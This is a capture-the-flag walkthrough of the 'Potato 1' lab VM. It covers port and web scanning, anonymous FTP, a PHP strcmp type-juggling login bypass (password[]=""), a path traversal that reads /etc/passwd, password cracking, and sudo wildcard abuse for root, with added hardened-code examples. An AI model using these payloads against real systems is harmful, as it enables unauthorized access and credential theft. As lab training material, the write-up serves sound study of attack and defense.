# Potato 1

![](/files/-MVuLKa7VqGg50OKsD2R)

I have completed this in 3 steps.

1. **Enumeration**: Nmap showed the way in
2. **Exploitation**: Burp proxy and a PHP vulnerability
3. **Post exploitation**: Abusing admin permissions

So let's talk in detail.

### 1. Enumeration

1\) At first, I need to know the target IP, so:

```
netdiscover -i eth0 -r 10.0.0.0/16
```

and I got the IP: 10.0.2.39

2\) As always, I have started with a scan of all ports:

```
nmap -p- -v -Pn 10.0.2.39
```

and I have got 3 ports open:

```
Discovered open port 22/tcp on 10.0.2.39
Discovered open port 80/tcp on 10.0.2.39
Discovered open port 2112/tcp on 10.0.2.39
```

3\) Now digging deeper into those ports:

```
nmap -sV -O -p80,22,2112 -v -Pn 10.0.2.39
```

An unusual port running FTP:

```
PORT     STATE  SERVICE  VERSION
22/tcp   open   ssh      OpenSSH 8.2p1 Ubuntu
80/tcp   open   http     Apache httpd 2.4.41 ((Ubuntu))
2112/tcp open   ftp      ProFTPD
```

4\) As it has a web page, I have started dirbuster to scan it:

![Running the scan](/files/-MVuM4RXIzt0He-mB_cf)

![Scan result](/files/-MVuM9km06Kd-kI88kd6)

5\) A Nikto scan also reveals similar info to dirbuster:

```
nikto -h http://10.0.2.39/
```

The scan report is:

```
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
```

6\) Found /admin and /admin/index.php. These pages show a login form.

![](/files/-MVuMWsAbmftQgbaVzbf)

7\) Attempts to brute force or guess the password have failed.

8\) Found logs.txt, but nothing interesting in it except a note that the admin has changed the password.

![](/files/-MVuMr9mDp2bgg1aICCa)

9\) After some failed attempts to brute force, I have focused on FTP. FTP login:

```
ftp -p 10.0.2.39 2112
```

I have found:

- anonymous login allowed
- 2 interesting files

```
-rw-r--r-- 1 ftp ftp 901 Aug 2 19:33 index.php.bak
-rw-r--r-- 1 ftp ftp 54 Aug 2 18:17 welcome.msg
```

Downloaded those files:

```
get index.php.bak
```

### 2. Exploitation

10\) From index.php.bak, I can see the source code:

![](/files/-MVuPkRnytwct2nMxGDB)

11\) I have tried SQL injection but failed. After some research, I have found this article about [type juggling](https://owasp.org/www-pdf-archive/PHPMagicTricks-TypeJuggling.pdf). It helps!

12\) Successfully exploited this vulnerability. I have used `password[]=""`

![](/files/-MVuPxxjACX2N1sC7j8u)
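The comparison that `password[]=""` defeats, shown beside a hardened version. This is an added example, not the VM's index.php (the page shows that only as a screenshot); it assumes the login compares `strcmp()`'s result loosely with 0, which is the usual form of this bug.

```php
<?php
// Added example, not the VM's code. Assumed vulnerable check: the submitted
// password goes straight into strcmp() and the result is compared loosely.
// On PHP 7.x, strcmp() given an array emits a warning and returns NULL, and
// NULL == 0 is true, so a body of password[]="" is accepted without knowing
// the password. (PHP 8 throws a TypeError here instead, which fails closed.)
function login_vulnerable(array $post, string $storedPassword): bool
{
    // $post['password'] is an array when the request body contains password[]=
    return @strcmp($post['password'], $storedPassword) == 0;
}

// Hardened version: refuse anything that is not a string, store only a
// password hash on the server, and let password_verify() do a constant-time
// comparison whose boolean result is checked strictly.
function login_hardened(array $post, string $storedPasswordHash): bool
{
    if (!isset($post['password']) || !is_string($post['password'])) {
        return false;
    }
    return password_verify($post['password'], $storedPasswordHash) === true;
}

// Constructed requests: a wrong password, the type-juggling payload from the
// write-up, and the real password, run through both checks.
$storedPassword = 'constructed-example-password';
$hash = password_hash($storedPassword, PASSWORD_DEFAULT);

$requests = [
    ['password' => 'wrong'],
    ['password' => ['']],            // what password[]="" decodes to
    ['password' => $storedPassword],
];
foreach ($requests as $post) {
    printf("%-42s vulnerable=%s hardened=%s\n",
        json_encode($post),
        login_vulnerable($post, $storedPassword) ? 'accepted' : 'rejected',
        login_hardened($post, $hash) ? 'accepted' : 'rejected');
}
```

Run under PHP 7.x, the array request is accepted by the vulnerable check and rejected by the hardened one; the string requests behave the same in both.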

13\) Result:

![](/files/-MVuQ3lwt3jZhGqmN7yT)

14\) But I am facing access denied message:

![](/files/-MVuQ9GMigrk4qIvgakq)

15\) Other pages don't have anything interesting except the Logs. I have intercepted all the requests with Burp, and I have found an interesting entry in the logs request. This will probably lead to LFI.

![](/files/-MVuQH7002gUzxnUesqb)

16\) I have tried `file=../../../../../etc/passwd`

![](/files/-MVuQUigPmu4X61_Qh3e)
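How the `file` parameter should have been handled. This is an added example, not the VM's logs page; it assumes the page joins the parameter onto a log directory (the directory path below is an assumption) and reads the result, which is what lets the `../` sequence reach /etc/passwd.

```php
<?php
// Added example, not the VM's code. LOG_DIR is an assumed location.
const LOG_DIR = '/var/www/html/admin/logs';

function read_log_vulnerable(string $file)
{
    // No validation: '../' sequences move the path anywhere the web user can read.
    return @file_get_contents(LOG_DIR . '/' . $file);
}

// Hardened version: accept only a plain file name matching an allowlisted
// pattern, then resolve the final path and confirm it still lies inside
// LOG_DIR. The second check also catches symlinks pointing outside it.
function read_log_hardened(string $file)
{
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(txt|log)\z/', $file)) {
        return false;   // rejects '/', '..', NUL bytes and odd extensions
    }
    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . '/' . $file);
    if ($base === false || $path === false) {
        return false;   // directory or file does not exist
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;   // resolved path escaped the log directory
    }
    return file_get_contents($path);
}

// Constructed requests: the legitimate log and the traversal payload from
// the write-up, run through both readers.
foreach (['logs.txt', '../../../../../etc/passwd'] as $file) {
    printf("%-30s vulnerable=%s hardened=%s\n", $file,
        read_log_vulnerable($file) === false ? 'refused' : 'served',
        read_log_hardened($file) === false ? 'refused' : 'served');
}
```

The vulnerable reader only "serves" the traversal payload on a host where LOG_DIR actually exists; the hardened one refuses it before touching the filesystem.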

17\) Got `webadmin:$1$webadmin$3sXBxGUtDGIFAcnNTNhi6.`. Here I have used John the Ripper and I have got:

1. user: webadmin
2. pass: dragon

18\) Now login to ssh

```
ssh webadmin@10.0.2.39
```

and eventually I have found the user flag

![](/files/-MVuQpKQ8xd69ErsGVxG)

### 3. Post Exploitation

19\) Now I need root access. I have looked for privileges beyond webadmin's own.

![](/files/-MVuRCNwNh1wfv-IqG9Y)

20\) Here, webadmin can execute /notes and anything after it. That's the key point! I have created a small shell and executed it.

![](/files/-MVuRNEWacaRtgnx6ctY)
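The sudo rule behind "anything after it", beside a corrected one. This is an added configuration example, not the VM's sudoers (the page shows `sudo -l` only as a screenshot); the wildcard form of the rule and the script names are assumptions.

```sudoers
# Assumed weak rule. A wildcard is matched against the whole command line, so
# whatever the user places after /notes/ (path or arguments) runs as root.
webadmin ALL=(ALL) /notes/*

# Corrected: name the exact scripts (placeholder names), allow no arguments
# (""), and keep the scripts root-owned and not writable by webadmin, or the
# user simply edits what sudo runs.
webadmin ALL=(ALL) /notes/example-report.sh "", /notes/example-clear.sh ""
```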

21\) Finally I have got the root flag in /root/root.txt

> bGljb3JuZSB1bmlqYW1iaXN0ZSBxdWkgZnVpdCBhdSBib3V0IGTigJl1biBkb3VibGUgYXJjLWVuLWNpZWwuIA==

Hope this write-up will help you. Any feedback is appreciated.
